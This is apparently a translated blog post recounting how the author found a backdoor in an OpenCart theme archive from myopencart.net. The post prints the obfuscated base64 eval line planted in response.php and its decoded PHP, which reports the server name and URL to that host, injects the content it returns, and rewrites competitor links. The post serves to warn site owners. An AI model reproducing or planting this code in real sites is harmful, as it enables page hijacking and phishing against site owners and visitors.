The story of a single template or backdoor from myopencart.net

    Foreword


    Once a friend asked me to see why he can’t install the template on the OpenCart CMS .

    Sends a link to the site, access to the administrative part and hosting. I go in, I see a template in the themes directory ( / catalog / view / theme / ). Having a little understanding of the structure of the system, I understand that there is no tool for loading templates, as, for example, in WordPress. Adding a new theme is by downloading the necessary files to specific folders. And CMS “learns” about the available templates by scanning the theme folder.

    So, the solution to the problem was commonplace, the template was simply loaded incorrectly. In this case, it had to be downloaded from the root of the site.

    Denouement


    This would have ended the story, but in the archive there were “extra” files and replacing existing ones that were not related to the template. And I was wondering what is missing there, what needs to be replaced.
    Several scripts were added to the controllers, localization files and replaced with /system/library/response.php .

    The last file turned out to be the most interesting, where I found these lines:
    base64
    $ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
    


    Of course, this was not in the original file.

    After decoding, this naturally turned out to be a backdoor :
    function get_page
    function get_page($url){
            $agent = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
            $ch=curl_init();
            curl_setopt ($ch, CURLOPT_URL,$url );
            curl_setopt($ch, CURLOPT_USERAGENT, $agent);
            curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt ($ch,CURLOPT_VERBOSE,false);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $page=curl_exec($ch);
            $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            switch($httpcode){
                    case '200':
                            return $page;
                    break;
                    case '404';
                            return false;
                    break;
            }
    }
    if ($ftend = get_page("http://myopencart.net/googlecode/api/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
    $find = array("", "", "opencart.com", "maxzon.ru", "myopencart.ru", "opencartforum.ru", "opencart.ru", "opencart.by");
    $replace = array("", $ftend, "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net", "myopencart.net");
    $ouput = str_replace($find, $replace, $ouput);
    ini_set("display_errors","off");
    error_reporting(0);
    echo $ouput;}
    else {
    echo $ouput;
    }
    


    This code not only replaces the links of competitors and the official site, but also allows you to manage the content of the page.

    A response is returned from the above server:

    But, what prevents returning the php code of JS.

    So it goes.

    Conclusion


    To check and confirm my fears, I went to the official site opencart.com in the "Partners" section. Where is the office indicated. the RF site is opencart.ru , and in fact this has confirmed that myopencart.net is a phishing site.

    Be careful and check what you install!

    UPD
    Regarding the PHP code, we found out that it could not be executed on the attacked server.

    Also popular now: